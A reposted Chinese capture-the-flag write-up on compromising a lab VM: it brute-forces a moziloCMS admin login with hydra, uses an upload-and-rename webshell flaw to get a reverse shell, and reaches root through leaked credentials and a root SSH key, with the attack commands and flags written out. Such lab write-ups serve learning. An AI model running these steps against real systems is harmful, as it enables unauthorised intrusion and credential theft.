news 2026/7/6 21:55:42

【打靶日记】群内靶机Tzh

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
【打靶日记】群内靶机Tzh

主机发现

┌──(root㉿xhh)-[~/Desktop/xhh/QQ/tzh]└─# arp-scan -I eth1 -l192.168.56.145 08:00:27:54:b9:37 PCS Systemtechnik GmbH

主机地址为:192.168.56.145

端口扫描

┌──(root㉿xhh)-[~/Desktop/xhh/QQ/tzh]└─# nmap -p- 192.168.56.145PORT STATE SERVICE22/tcpopenssh80/tcpopenhttp

80探测

发现是给什么VisionX,貌似没什么用

目录枚举

┌──(root㉿xhh)-[~/Desktop/xhh/QQ/tzh]└─# dirsearch -u http://192.168.56.145[00:40:07]200- 3MB - /backup.zip Task Completed

有个backup.zip,大概是什么的备份文件

代码审计

下载backup.zip

┌──(root㉿xhh)-[~/Desktop/xhh/QQ/tzh]└─# lsbackup.zip mozilo3.0-3.0.1 reports

解压出一个moziloCMS,那估计部署了

┌──(root㉿xhh)-[~/…/xhh/QQ/tzh/mozilo3.0-3.0.1]└─# lsREADME.md admin docu gpl.txt install.php layouts liesmich.txt readme.txt update.php SECURITY.md cms galerien index.php kategorien lgpl.txt plugins sitemap_addon.xml

所有解压出来的文件/文件夹

聚焦install.php

┌──(root㉿xhh)-[~/…/xhh/QQ/tzh/mozilo3.0-3.0.1]└─# cat install.php | grep "pass"(......)if(strlen($_POST['password1'])<8or!preg_match("/[0-9]/",$_POST['password1'])or!preg_match("/[a-z]/",$_POST['password1'])or!preg_match("/[A-Z]/",$_POST['password1'])

得到密码规则,不少于8位、至少一个数字、大写字母、小写字母

爆破后台管理员密码

获取爆破密码本

┌──(root㉿xhh)-[~/…/xhh/QQ/tzh/mozilo3.0-3.0.1]└─# grep -P '^(?=.*\d)(?=.*[a-z])(?=.*[A-Z]).{8,}$' /rockyou.txt > ./pass.txt┌──(root㉿xhh)-[~/…/xhh/QQ/tzh/mozilo3.0-3.0.1]└─# cat pass.txt | wc -l343091

通过正则匹配出符合要求的密码在rockyou.txt中

爆破

┌──(root㉿xhh)-[~/…/xhh/QQ/tzh/mozilo3.0-3.0.1]└─# hydra -l admin -P pass.txt 192.168.56.145 http-post-form "/mozilo/admin/index.php:username=^USER^&password=^PASS^&login=1:S=302" -vV[80][http-post-form]host:192.168.56.145 login: admin password: Admin123

拿到后台管理员密码

反弹shell

找找这个CMS有没有什么漏洞

找到一个版本一致的RCE

Steps to Reproduce: 1. Login as admin 2. Go to the Files session by the left menu 3. Create a .jpg file with it content having a php web shell 4. Upload the file to the server via the upload icon and save 5. Rename the file to .php on the web server and save 6. Access webshell via this endpoint : http://127.0.0.1/mozilo3.0-3.0.1/kategorien/Willkommen/dateien/revshell.php

按步骤走,获取反弹shell

┌──(root㉿xhh)-[~/…/xhh/QQ/tzh/mozilo3.0-3.0.1]└─# nc -lvnp 6666listening on[any]6666...idconnect to[192.168.56.247]from(UNKNOWN)[192.168.56.145]45738uid=33(www-data)gid=33(www-data)groups=33(www-data)

成功获得webshell

提权

welcome提权

翻找文件,在admin目录下的配置文件config.php中找到welcome用户的凭证

www-data@Lzh:/var/www/html/mozilo/admin$catconfig.php|grep"welcome"// welcome:3e73d572ba005bb3c02107b2e2fc16f8
welcome@Lzh:~$iduid=1000(welcome)gid=1000(welcome)groups=1000(welcome)

成功获得welcome用户权限

user.txt
welcome@Lzh:~$catuser.txt flag{user-9bd9f512a064d385d8b5594fea0f2fc4}

root提权

welcome@Lzh:~$ls-al total28drwx------2welcome welcome4096Apr122025.drwxr-xr-x3root root4096Apr112025..lrwxrwxrwx1root root9Apr112025.bash_history ->/dev/null -rw-r--r--1welcome welcome220Apr112025.bash_logout -rw-r--r--1welcome welcome3526Apr112025.bashrc -rw-r--r--1root root2590Apr122025id_rsa -rw-r--r--1welcome welcome807Apr112025.profile -rw-r--r--1welcome welcome44Apr122025user.txt lrwxrwxrwx1root root9Apr122025.viminfo ->/dev/null

发现本地有个root用户的id_rsa文件

welcome@Lzh:~$catid_rsa -----BEGIN OPENSSH PRIVATE KEY----- ???lbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn(....)-----END OPENSSH PRIVATE KEY-----

发现第一行的前三位是问号

因为前面的为版本标识“openssh-key-v1”编码的结果,所以前三位是b3B

welcome@Lzh:~$chmod600idwelcome@Lzh:~$sshroot@127.0.0.1 -iidroot@Lzh:~# iduid=0(root)gid=0(root)groups=0(root)

成功获得root权限

root.txt
root@Lzh:~# cat root.txtflag{root-b32e83d3432bcfe475fd6b6f58f1f559}
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/7/7 16:15:58

NVIDIA DALI数据处理实战指南:5大核心问题解决方案

NVIDIA DALI数据处理实战指南&#xff1a;5大核心问题解决方案 【免费下载链接】DALI NVIDIA/DALI: DALI 是一个用于数据预处理和增强的 Python 库&#xff0c;可以用于图像&#xff0c;视频和音频数据的处理和增强&#xff0c;支持多种数据格式和平台&#xff0c;如 Python&am…

作者头像 李华
网站建设 2026/7/7 10:26:32

Logseq 2025:从个人知识库到团队协作空间的智能进化

Logseq 2025&#xff1a;从个人知识库到团队协作空间的智能进化 【免费下载链接】logseq A privacy-first, open-source platform for knowledge management and collaboration. Download link: http://github.com/logseq/logseq/releases. roadmap: http://trello.com/b/8txSM…

作者头像 李华
网站建设 2026/7/7 13:44:49

1、深入探索 Docker 扩展的奥秘

深入探索 Docker 扩展的奥秘 1. Docker 的崛起 在科技发展的长河中,很少有技术能像 Docker 一样在整个行业内得到如此广泛的应用。自 2013 年 3 月首次公开发布以来,Docker 不仅赢得了像你我这样的终端用户的支持,还获得了亚马逊、微软和谷歌等行业巨头的青睐。 Docker 在…

作者头像 李华